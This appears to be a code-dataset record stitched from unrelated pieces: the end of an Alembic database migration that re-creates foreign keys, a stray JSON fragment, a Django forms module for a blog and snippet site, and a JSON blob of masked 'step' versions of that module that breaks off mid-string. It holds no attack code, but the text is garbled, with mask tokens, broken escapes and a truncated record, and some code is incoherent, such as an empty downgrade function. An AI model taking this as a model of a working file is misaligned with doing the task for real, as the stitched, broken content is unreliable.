op.execute(\"ALTER TABLE users ALTER COLUMN team_id TYPE \\\n UUID USING team_id::uuid\")\n\n # Re-Create constraint\n op.create_foreign_key('component_files_component_id_fkey',\n 'component_files', 'components',\n ['component_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('components_topic_id_fkey',\n 'components', 'topics',\n ['topic_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('files_job_id_fkey',\n 'files', 'jobs',\n ['job_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('files_jobstate_id_fkey',\n 'files', 'jobstates',\n ['jobstate_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('files_team_id_fkey',\n 'files', 'teams',\n ['team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('files_test_id_fkey',\n 'files', 'tests',\n ['test_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobdefinition_tests_jobdefinition_id_fkey',\n 'jobdefinition_tests', 'jobdefinitions',\n ['jobdefinition_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobdefinition_tests_test_id_fkey',\n 'jobdefinition_tests', 'tests',\n ['test_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobdefinitions_topic_id_fkey',\n 'jobdefinitions', 'topics',\n ['topic_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_team_id_fkey',\n 'jobs', 'teams',\n ['team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_jobdefinition_id_fkey',\n 'jobs', 'jobdefinitions',\n ['jobdefinition_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_remoteci_id_fkey',\n 'jobs', 'remotecis',\n ['remoteci_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_previous_job_id_fkey',\n 'jobs', 'jobs',\n ['previous_job_id'], ['id'])\n op.create_foreign_key('jobs_components_component_id_fkey',\n 'jobs_components', 'components',\n ['component_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_components_job_id_fkey',\n 'jobs_components', 'jobs',\n ['job_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_issues_issue_id_fkey',\n 'jobs_issues', 'issues',\n ['issue_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_issues_job_id_fkey',\n 'jobs_issues', 'jobs',\n ['job_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobstates_team_id_fkey',\n 'jobstates', 'teams',\n ['team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobstates_job_id_fkey',\n 'jobstates', 'jobs',\n ['job_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('logs_team_id_fkey',\n 'logs', 'teams',\n ['team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('logs_user_id_fkey',\n 'logs', 'users',\n ['user_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('metas_job_id_fkey',\n 'metas', 'jobs',\n ['job_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('remoteci_tests_test_id_fkey',\n 'remoteci_tests', 'tests',\n ['test_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('remoteci_tests_remoteci_id_fkey',\n 'remoteci_tests', 'remotecis',\n ['remoteci_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('remotecis_team_id_fkey',\n 'remotecis', 'teams',\n ['team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('tests_team_id_fkey',\n 'tests', 'teams',\n ['team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('topic_tests_test_id_fkey',\n 'topic_tests', 'tests',\n ['test_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('topic_tests_topic_id_fkey',\n 'topic_tests', 'topics',\n ['topic_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('topics_next_topic_fkey',\n 'topics', 'topics',\n ['next_topic'], ['id'])\n op.create_foreign_key('topics_teams_topic_id_fkey',\n 'topics_teams', 'topics',\n ['topic_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('topics_teams_team_id_fkey',\n 'topics_teams', 'teams',\n ['team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('user_remotecis_user_id_fkey',\n 'user_remotecis', 'users',\n ['user_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('user_remotecis_remoteci_id_fkey',\n 'user_remotecis', 'remotecis',\n ['remoteci_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('users_team_id_fkey',\n 'users', 'teams',\n ['team_id'], ['id'], ondelete='CASCADE')\n\n\ndef downgrade():\n pass\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
from django import forms from django.contrib.auth.models import User from .models import TblPublish , TblSnippetTopics, TblSnippetData, TblLearnTopics, TblLearnData, TblBlog, TblBlogComments,TblLearnDataComments, TblBlogGvp, TblLearnDataGvp,TblSnippetDataGvp, TblHome, TblAbout, TblQueries from django.contrib.auth.forms import UserCreationForm class UsersigninForm(forms.Form): username = forms.CharField(required = True, label = 'Username', max_length = 100, widget=forms.TextInput(attrs={'placeholder': 'Username'})) password = forms.CharField(required = True, label = 'Password', max_length = 32, widget = forms.PasswordInput(attrs={'placeholder': 'Password'})) class SignupForm(UserCreationForm): email = forms.EmailField(max_length=200, help_text='Required') class Meta: model = User fields = ('username', 'email', 'password1', 'password2') def __init__(self, *args, **kwargs): super(SignupForm, self).__init__(*args, **kwargs) self.fields['username'].widget.attrs['placeholder'] = "Username" self.fields['email'].widget.attrs['placeholder'] = "email" self.fields['password1'].widget.attrs['placeholder'] ="password" self.fields['password2'].widget.attrs['placeholder'] = "password Again" class UserRegistrationForm(forms.Form): username = forms.CharField(required = True, min_length=6,label = 'Username', max_length = 100, widget=forms.TextInput(attrs={'placeholder': 'Username'}) ) email = forms.EmailField(required = True, label = 'Email', max_length = 100, widget=forms.EmailInput(attrs={'placeholder': 'e.g. : email@gmail.com'})) firstname = forms.CharField(required = True, label = 'First Name', max_length = 100, widget=forms.TextInput(attrs={'placeholder': 'First Name'})) lastname = forms.CharField(required = True, label = 'Last Name', max_length = 100, widget=forms.TextInput(attrs={'placeholder': 'Last Name'})) password = forms.CharField(required = True, label = 'Password', max_length = 100, widget = forms.PasswordInput(attrs={'placeholder': 'Password'})) passwordagain = forms.CharField(required = True, label = 'Password (Again)', max_length = 100, widget = forms.PasswordInput(attrs={'placeholder': 'Password (Again)'})) class TblPublishForm(forms.ModelForm): class Meta(): model = TblPublish fields = '__all__' class TblSnippetDataForm(forms.ModelForm): class Meta(): model = TblSnippetData fields = ['snippet_topics','snippet_data_subject','snippet_data_description','snippet_data_keyword','snippet_data_code','snippet_data_datetime','snippet_data_added_by','snippet_topics','snippet_data_publish'] def clean_snippet_topics_added_by(self): if not self.cleaned_data['snippet_topics_added_by']: return User() return self.cleaned_data['snippet_topics_added_by'] def __init__(self, *args, **kwargs): super(TblSnippetDataForm, self).__init__(*args, **kwargs) self.fields['snippet_data_datetime'].widget = forms.HiddenInput() self.fields['snippet_data_added_by'].widget = forms.HiddenInput() self.fields['snippet_topics'].widget = forms.HiddenInput() self.fields['snippet_data_subject'].widget.attrs['placeholder'] = "Title/Topics" self.fields['snippet_data_description'].widget.attrs['placeholder'] = "Brief Description" self.fields['snippet_data_keyword'].widget.attrs['placeholder'] ="Keyword For Search" self.fields['snippet_data_code'].widget.attrs['placeholder'] = "Snippet (Code)" self.fields['snippet_data_publish'].widget.attrs['placeholder'] = "Ready-To-Publish" self.fields['snippet_data_publish'].label = "Publish" class TblBlogForm(forms.ModelForm): class Meta(): model = TblBlog fields = ['blog_title','blog_description','blog_keyword','blog_content','blog_pics','blog_publish','blog_datetime','blog_summary','blog_like','blog_added_by'] def __init__(self, *args, **kwargs): super(TblBlogForm, self).__init__(*args, **kwargs) self.fields['blog_datetime'].widget = forms.HiddenInput() self.fields['blog_summary'].widget = forms.HiddenInput() self.fields['blog_like'].widget = forms.HiddenInput() self.fields['blog_added_by'].widget = forms.HiddenInput() self.fields['blog_title'].widget.attrs['placeholder'] = "Title/Topics" self.fields['blog_description'].widget.attrs['placeholder'] = "Brief Description" self.fields['blog_content'].widget.attrs['placeholder'] = "Blog Content" self.fields['blog_keyword'].widget.attrs['placeholder'] = "Keyword For Search" self.fields['blog_pics'].widget.attrs['placeholder'] = "Upload Pics" self.fields['blog_publish'].label = "Publish" class TblBlogCommentsForm(forms.ModelForm): class Meta(): model = TblBlogComments fields = '__all__' class TblLearnDataForm(forms.ModelForm): class Meta(): model = TblLearnData fields = ['learn_data','learn_data_keyword','learn_data_description','learn_data_publish','learn_data_datetime','learn_data_added_by','learn_topics','learn_data_like','learn_data_icon'] def __init__(self, *args, **kwargs): super(TblLearnDataForm, self).__init__(*args, **kwargs) self.fields['learn_data_datetime'].widget = forms.HiddenInput() self.fields['learn_data_added_by'].widget = forms.HiddenInput() self.fields['learn_topics'].widget = forms.HiddenInput() self.fields['learn_data_like'].widget = forms.HiddenInput() self.fields['learn_data_icon'].widget = forms.HiddenInput() self.fields['learn_data'].widget.attrs['placeholder'] = "Title/Topics" self.fields['learn_data_description'].widget.attrs['placeholder'] = "Brief Description" self.fields['learn_data_keyword'].widget.attrs['placeholder'] = "Keyword For Search" self.fields['learn_data_publish'].label = "Publish" class TblLearnDataCommentsForm(forms.ModelForm): class Meta(): model = TblLearnDataComments fields = '__all__' class TblBlogGvpForm(forms.ModelForm): class Meta(): model = TblBlogGvp fields = '__all__' class TblLearnDataGvpForm(forms.ModelForm): class Meta(): model = TblLearnDataGvp fields = '__all__' class TblHomeForm(forms.ModelForm): class Meta(): model = TblHome fields = '__all__' def __init__(self, *args, **kwargs): super(TblHomeForm, self).__init__(*args, **kwargs) self.fields['home_datetime'].widget = forms.HiddenInput() self.fields['home_added_by'].widget = forms.HiddenInput() self.fields['home_pics'].widget.attrs['placeholder'] = "Upload Image" self.fields['home_content'].widget.attrs['placeholder'] = "Content" self.fields['home_content_description'].widget.attrs['placeholder'] = "Description" self.fields['home_publish'].label = "Publish" class TblAboutForm(forms.ModelForm): class Meta(): model = TblAbout fields = '__all__' def __init__(self, *args, **kwargs): super(TblAboutForm, self).__init__(*args, **kwargs) self.fields['about_datetime'].widget = forms.HiddenInput() self.fields['about_added_by'].widget = forms.HiddenInput() self.fields['about_pics'].widget.attrs['placeholder'] = "Upload Image" self.fields['about_content'].widget.attrs['placeholder'] = "Content" self.fields['about_content_description'].widget.attrs['placeholder'] = "Description" self.fields['about_publish'].label = "Publish" class TblLearnTopicsForm(forms.ModelForm): class Meta(): model = TblLearnTopics fields = '__all__' def __init__(self, *args, **kwargs): super(TblLearnTopicsForm, self).__init__(*args, **kwargs) self.fields['learn_topics_datetime'].widget = forms.HiddenInput() # self.fields['learn_topics_added_by'].widget = forms.HiddenInput() self.fields['learn_topics_icon'].widget.attrs['placeholder'] = 'Icon' self.fields['learn_topics_coverpage_img'].widget = forms.HiddenInput() self.fields['learn_topics'].widget.attrs['placeholder'] = "Topics" self.fields['learn_topics_description'].widget.attrs['placeholder'] = "Description" self.fields['learn_topics_publish'].label = "Publish" def clean_learn_topics_added_by(self): if not self.cleaned_data['learn_topics_added_by']: return User() return self.cleaned_data['learn_topics_added_by'] class TblSnippetTopicsForm(forms.ModelForm): class Meta(): model = TblSnippetTopics fields = '__all__' def __init__(self, *args, **kwargs): super(TblSnippetTopicsForm, self).__init__(*args, **kwargs) self.fields['snippet_topics_datetime'].widget = forms.HiddenInput() self.fields['snippet_topics_added_by'].widget = forms.HiddenInput() self.fields['snippet_topics_icon'].widget = forms.HiddenInput() self.fields['snippet_topics_coverpage_img'].widget = forms.HiddenInput() self.fields['snippet_topics_expire'].widget = forms.HiddenInput() self.fields['snippet_topics'].widget.attrs['placeholder'] = "Topics" self.fields['snippet_topics_description'].widget.attrs['placeholder'] = "Description" self.fields['snippet_topics_publish'].label = "Publish" def clean_snippet_topics_added_by(self): if not self.cleaned_data['snippet_topics_added_by']: return User() return self.cleaned_data['snippet_topics_added_by'] class TblQueriesForm(forms.ModelForm): class Meta(): model = TblQueries fields = '__all__' def __init__(self, *args, **kwargs): super(TblQueriesForm, self).__init__(*args, **kwargs) self.fields['datetime'].widget = forms.HiddenInput() self.fields['name'].widget.attrs['placeholder'] = "Name" self.fields['email'].widget.attrs['placeholder'] = "Email" self.fields['subject'].widget.attrs['placeholder'] = "Subject" self.fields['message'].widget.attrs['placeholder'] = "Message"
normal
{ "blob_id": "9e02b1a90d61de6d794dd350b50417a2f7260df6", "index": 5947, "step-1": "<mask token>\n\n\nclass TblBlogForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlog\n fields = ['blog_title', 'blog_description', 'blog_keyword',\n 'blog_content', 'blog_pics', 'blog_publish', 'blog_datetime',\n 'blog_summary', 'blog_like', 'blog_added_by']\n <mask token>\n\n\nclass TblBlogCommentsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlogComments\n fields = '__all__'\n\n\nclass TblLearnDataForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnData\n fields = ['learn_data', 'learn_data_keyword',\n 'learn_data_description', 'learn_data_publish',\n 'learn_data_datetime', 'learn_data_added_by', 'learn_topics',\n 'learn_data_like', 'learn_data_icon']\n\n def __init__(self, *args, **kwargs):\n super(TblLearnDataForm, self).__init__(*args, **kwargs)\n self.fields['learn_data_datetime'].widget = forms.HiddenInput()\n self.fields['learn_data_added_by'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget = forms.HiddenInput()\n self.fields['learn_data_like'].widget = forms.HiddenInput()\n self.fields['learn_data_icon'].widget = forms.HiddenInput()\n self.fields['learn_data'].widget.attrs['placeholder'] = 'Title/Topics'\n self.fields['learn_data_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['learn_data_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['learn_data_publish'].label = 'Publish'\n\n\nclass TblLearnDataCommentsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnDataComments\n fields = '__all__'\n\n\nclass TblBlogGvpForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlogGvp\n fields = '__all__'\n\n\nclass TblLearnDataGvpForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnDataGvp\n fields = '__all__'\n\n\nclass TblHomeForm(forms.ModelForm):\n\n\n class Meta:\n model = TblHome\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblHomeForm, self).__init__(*args, **kwargs)\n self.fields['home_datetime'].widget = forms.HiddenInput()\n self.fields['home_added_by'].widget = forms.HiddenInput()\n self.fields['home_pics'].widget.attrs['placeholder'] = 'Upload Image'\n self.fields['home_content'].widget.attrs['placeholder'] = 'Content'\n self.fields['home_content_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['home_publish'].label = 'Publish'\n\n\nclass TblAboutForm(forms.ModelForm):\n\n\n class Meta:\n model = TblAbout\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblAboutForm, self).__init__(*args, **kwargs)\n self.fields['about_datetime'].widget = forms.HiddenInput()\n self.fields['about_added_by'].widget = forms.HiddenInput()\n self.fields['about_pics'].widget.attrs['placeholder'] = 'Upload Image'\n self.fields['about_content'].widget.attrs['placeholder'] = 'Content'\n self.fields['about_content_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['about_publish'].label = 'Publish'\n\n\nclass TblLearnTopicsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnTopics\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblLearnTopicsForm, self).__init__(*args, **kwargs)\n self.fields['learn_topics_datetime'].widget = forms.HiddenInput()\n self.fields['learn_topics_icon'].widget.attrs['placeholder'] = 'Icon'\n self.fields['learn_topics_coverpage_img'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget.attrs['placeholder'] = 'Topics'\n self.fields['learn_topics_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['learn_topics_publish'].label = 'Publish'\n\n def clean_learn_topics_added_by(self):\n if not self.cleaned_data['learn_topics_added_by']:\n return User()\n return self.cleaned_data['learn_topics_added_by']\n\n\nclass TblSnippetTopicsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblSnippetTopics\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblSnippetTopicsForm, self).__init__(*args, **kwargs)\n self.fields['snippet_topics_datetime'].widget = forms.HiddenInput()\n self.fields['snippet_topics_added_by'].widget = forms.HiddenInput()\n self.fields['snippet_topics_icon'].widget = forms.HiddenInput()\n self.fields['snippet_topics_coverpage_img'].widget = forms.HiddenInput(\n )\n self.fields['snippet_topics_expire'].widget = forms.HiddenInput()\n self.fields['snippet_topics'].widget.attrs['placeholder'] = 'Topics'\n self.fields['snippet_topics_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['snippet_topics_publish'].label = 'Publish'\n\n def clean_snippet_topics_added_by(self):\n if not self.cleaned_data['snippet_topics_added_by']:\n return User()\n return self.cleaned_data['snippet_topics_added_by']\n\n\nclass TblQueriesForm(forms.ModelForm):\n\n\n class Meta:\n model = TblQueries\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblQueriesForm, self).__init__(*args, **kwargs)\n self.fields['datetime'].widget = forms.HiddenInput()\n self.fields['name'].widget.attrs['placeholder'] = 'Name'\n self.fields['email'].widget.attrs['placeholder'] = 'Email'\n self.fields['subject'].widget.attrs['placeholder'] = 'Subject'\n self.fields['message'].widget.attrs['placeholder'] = 'Message'\n", "step-2": "<mask token>\n\n\nclass TblBlogForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlog\n fields = ['blog_title', 'blog_description', 'blog_keyword',\n 'blog_content', 'blog_pics', 'blog_publish', 'blog_datetime',\n 'blog_summary', 'blog_like', 'blog_added_by']\n\n def __init__(self, *args, **kwargs):\n super(TblBlogForm, self).__init__(*args, **kwargs)\n self.fields['blog_datetime'].widget = forms.HiddenInput()\n self.fields['blog_summary'].widget = forms.HiddenInput()\n self.fields['blog_like'].widget = forms.HiddenInput()\n self.fields['blog_added_by'].widget = forms.HiddenInput()\n self.fields['blog_title'].widget.attrs['placeholder'] = 'Title/Topics'\n self.fields['blog_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['blog_content'].widget.attrs['placeholder'\n ] = 'Blog Content'\n self.fields['blog_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['blog_pics'].widget.attrs['placeholder'] = 'Upload Pics'\n self.fields['blog_publish'].label = 'Publish'\n\n\nclass TblBlogCommentsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlogComments\n fields = '__all__'\n\n\nclass TblLearnDataForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnData\n fields = ['learn_data', 'learn_data_keyword',\n 'learn_data_description', 'learn_data_publish',\n 'learn_data_datetime', 'learn_data_added_by', 'learn_topics',\n 'learn_data_like', 'learn_data_icon']\n\n def __init__(self, *args, **kwargs):\n super(TblLearnDataForm, self).__init__(*args, **kwargs)\n self.fields['learn_data_datetime'].widget = forms.HiddenInput()\n self.fields['learn_data_added_by'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget = forms.HiddenInput()\n self.fields['learn_data_like'].widget = forms.HiddenInput()\n self.fields['learn_data_icon'].widget = forms.HiddenInput()\n self.fields['learn_data'].widget.attrs['placeholder'] = 'Title/Topics'\n self.fields['learn_data_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['learn_data_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['learn_data_publish'].label = 'Publish'\n\n\nclass TblLearnDataCommentsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnDataComments\n fields = '__all__'\n\n\nclass TblBlogGvpForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlogGvp\n fields = '__all__'\n\n\nclass TblLearnDataGvpForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnDataGvp\n fields = '__all__'\n\n\nclass TblHomeForm(forms.ModelForm):\n\n\n class Meta:\n model = TblHome\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblHomeForm, self).__init__(*args, **kwargs)\n self.fields['home_datetime'].widget = forms.HiddenInput()\n self.fields['home_added_by'].widget = forms.HiddenInput()\n self.fields['home_pics'].widget.attrs['placeholder'] = 'Upload Image'\n self.fields['home_content'].widget.attrs['placeholder'] = 'Content'\n self.fields['home_content_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['home_publish'].label = 'Publish'\n\n\nclass TblAboutForm(forms.ModelForm):\n\n\n class Meta:\n model = TblAbout\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblAboutForm, self).__init__(*args, **kwargs)\n self.fields['about_datetime'].widget = forms.HiddenInput()\n self.fields['about_added_by'].widget = forms.HiddenInput()\n self.fields['about_pics'].widget.attrs['placeholder'] = 'Upload Image'\n self.fields['about_content'].widget.attrs['placeholder'] = 'Content'\n self.fields['about_content_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['about_publish'].label = 'Publish'\n\n\nclass TblLearnTopicsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnTopics\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblLearnTopicsForm, self).__init__(*args, **kwargs)\n self.fields['learn_topics_datetime'].widget = forms.HiddenInput()\n self.fields['learn_topics_icon'].widget.attrs['placeholder'] = 'Icon'\n self.fields['learn_topics_coverpage_img'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget.attrs['placeholder'] = 'Topics'\n self.fields['learn_topics_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['learn_topics_publish'].label = 'Publish'\n\n def clean_learn_topics_added_by(self):\n if not self.cleaned_data['learn_topics_added_by']:\n return User()\n return self.cleaned_data['learn_topics_added_by']\n\n\nclass TblSnippetTopicsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblSnippetTopics\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblSnippetTopicsForm, self).__init__(*args, **kwargs)\n self.fields['snippet_topics_datetime'].widget = forms.HiddenInput()\n self.fields['snippet_topics_added_by'].widget = forms.HiddenInput()\n self.fields['snippet_topics_icon'].widget = forms.HiddenInput()\n self.fields['snippet_topics_coverpage_img'].widget = forms.HiddenInput(\n )\n self.fields['snippet_topics_expire'].widget = forms.HiddenInput()\n self.fields['snippet_topics'].widget.attrs['placeholder'] = 'Topics'\n self.fields['snippet_topics_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['snippet_topics_publish'].label = 'Publish'\n\n def clean_snippet_topics_added_by(self):\n if not self.cleaned_data['snippet_topics_added_by']:\n return User()\n return self.cleaned_data['snippet_topics_added_by']\n\n\nclass TblQueriesForm(forms.ModelForm):\n\n\n class Meta:\n model = TblQueries\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblQueriesForm, self).__init__(*args, **kwargs)\n self.fields['datetime'].widget = forms.HiddenInput()\n self.fields['name'].widget.attrs['placeholder'] = 'Name'\n self.fields['email'].widget.attrs['placeholder'] = 'Email'\n self.fields['subject'].widget.attrs['placeholder'] = 'Subject'\n self.fields['message'].widget.attrs['placeholder'] = 'Message'\n", "step-3": "<mask token>\n\n\nclass TblSnippetDataForm(forms.ModelForm):\n\n\n class Meta:\n model = TblSnippetData\n fields = ['snippet_topics', 'snippet_data_subject',\n 'snippet_data_description', 'snippet_data_keyword',\n 'snippet_data_code', 'snippet_data_datetime',\n 'snippet_data_added_by', 'snippet_topics', 'snippet_data_publish']\n\n def clean_snippet_topics_added_by(self):\n if not self.cleaned_data['snippet_topics_added_by']:\n return User()\n return self.cleaned_data['snippet_topics_added_by']\n\n def __init__(self, *args, **kwargs):\n super(TblSnippetDataForm, self).__init__(*args, **kwargs)\n self.fields['snippet_data_datetime'].widget = forms.HiddenInput()\n self.fields['snippet_data_added_by'].widget = forms.HiddenInput()\n self.fields['snippet_topics'].widget = forms.HiddenInput()\n self.fields['snippet_data_subject'].widget.attrs['placeholder'\n ] = 'Title/Topics'\n self.fields['snippet_data_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['snippet_data_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['snippet_data_code'].widget.attrs['placeholder'\n ] = 'Snippet (Code)'\n self.fields['snippet_data_publish'].widget.attrs['placeholder'\n ] = 'Ready-To-Publish'\n self.fields['snippet_data_publish'].label = 'Publish'\n\n\nclass TblBlogForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlog\n fields = ['blog_title', 'blog_description', 'blog_keyword',\n 'blog_content', 'blog_pics', 'blog_publish', 'blog_datetime',\n 'blog_summary', 'blog_like', 'blog_added_by']\n\n def __init__(self, *args, **kwargs):\n super(TblBlogForm, self).__init__(*args, **kwargs)\n self.fields['blog_datetime'].widget = forms.HiddenInput()\n self.fields['blog_summary'].widget = forms.HiddenInput()\n self.fields['blog_like'].widget = forms.HiddenInput()\n self.fields['blog_added_by'].widget = forms.HiddenInput()\n self.fields['blog_title'].widget.attrs['placeholder'] = 'Title/Topics'\n self.fields['blog_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['blog_content'].widget.attrs['placeholder'\n ] = 'Blog Content'\n self.fields['blog_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['blog_pics'].widget.attrs['placeholder'] = 'Upload Pics'\n self.fields['blog_publish'].label = 'Publish'\n\n\nclass TblBlogCommentsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlogComments\n fields = '__all__'\n\n\nclass TblLearnDataForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnData\n fields = ['learn_data', 'learn_data_keyword',\n 'learn_data_description', 'learn_data_publish',\n 'learn_data_datetime', 'learn_data_added_by', 'learn_topics',\n 'learn_data_like', 'learn_data_icon']\n\n def __init__(self, *args, **kwargs):\n super(TblLearnDataForm, self).__init__(*args, **kwargs)\n self.fields['learn_data_datetime'].widget = forms.HiddenInput()\n self.fields['learn_data_added_by'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget = forms.HiddenInput()\n self.fields['learn_data_like'].widget = forms.HiddenInput()\n self.fields['learn_data_icon'].widget = forms.HiddenInput()\n self.fields['learn_data'].widget.attrs['placeholder'] = 'Title/Topics'\n self.fields['learn_data_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['learn_data_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['learn_data_publish'].label = 'Publish'\n\n\nclass TblLearnDataCommentsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnDataComments\n fields = '__all__'\n\n\nclass TblBlogGvpForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlogGvp\n fields = '__all__'\n\n\nclass TblLearnDataGvpForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnDataGvp\n fields = '__all__'\n\n\nclass TblHomeForm(forms.ModelForm):\n\n\n class Meta:\n model = TblHome\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblHomeForm, self).__init__(*args, **kwargs)\n self.fields['home_datetime'].widget = forms.HiddenInput()\n self.fields['home_added_by'].widget = forms.HiddenInput()\n self.fields['home_pics'].widget.attrs['placeholder'] = 'Upload Image'\n self.fields['home_content'].widget.attrs['placeholder'] = 'Content'\n self.fields['home_content_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['home_publish'].label = 'Publish'\n\n\nclass TblAboutForm(forms.ModelForm):\n\n\n class Meta:\n model = TblAbout\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblAboutForm, self).__init__(*args, **kwargs)\n self.fields['about_datetime'].widget = forms.HiddenInput()\n self.fields['about_added_by'].widget = forms.HiddenInput()\n self.fields['about_pics'].widget.attrs['placeholder'] = 'Upload Image'\n self.fields['about_content'].widget.attrs['placeholder'] = 'Content'\n self.fields['about_content_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['about_publish'].label = 'Publish'\n\n\nclass TblLearnTopicsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnTopics\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblLearnTopicsForm, self).__init__(*args, **kwargs)\n self.fields['learn_topics_datetime'].widget = forms.HiddenInput()\n self.fields['learn_topics_icon'].widget.attrs['placeholder'] = 'Icon'\n self.fields['learn_topics_coverpage_img'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget.attrs['placeholder'] = 'Topics'\n self.fields['learn_topics_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['learn_topics_publish'].label = 'Publish'\n\n def clean_learn_topics_added_by(self):\n if not self.cleaned_data['learn_topics_added_by']:\n return User()\n return self.cleaned_data['learn_topics_added_by']\n\n\nclass TblSnippetTopicsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblSnippetTopics\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblSnippetTopicsForm, self).__init__(*args, **kwargs)\n self.fields['snippet_topics_datetime'].widget = forms.HiddenInput()\n self.fields['snippet_topics_added_by'].widget = forms.HiddenInput()\n self.fields['snippet_topics_icon'].widget = forms.HiddenInput()\n self.fields['snippet_topics_coverpage_img'].widget = forms.HiddenInput(\n )\n self.fields['snippet_topics_expire'].widget = forms.HiddenInput()\n self.fields['snippet_topics'].widget.attrs['placeholder'] = 'Topics'\n self.fields['snippet_topics_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['snippet_topics_publish'].label = 'Publish'\n\n def clean_snippet_topics_added_by(self):\n if not self.cleaned_data['snippet_topics_added_by']:\n return User()\n return 